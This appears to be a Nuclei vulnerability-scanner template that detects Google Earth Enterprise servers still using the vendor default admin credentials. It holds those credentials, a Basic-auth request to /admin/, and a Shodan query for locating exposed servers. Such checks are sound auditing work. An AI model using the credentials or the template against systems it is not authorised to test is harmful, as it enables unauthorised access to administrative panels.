id: google-earth-dlogin

info:
  name: Google Earth Enterprise Default Login
  author: orpheus,johnjhacking
  severity: high
  tags: default-login,google
  reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
  metadata:
    shodan-query: 'title:"GEE Server"'

requests:
  - raw:
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - geapacheuser

      password:
        - geeadmin

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        condition: and
        words:
          - 'DashboardPanel'
          - 'Earth Enterprise Server'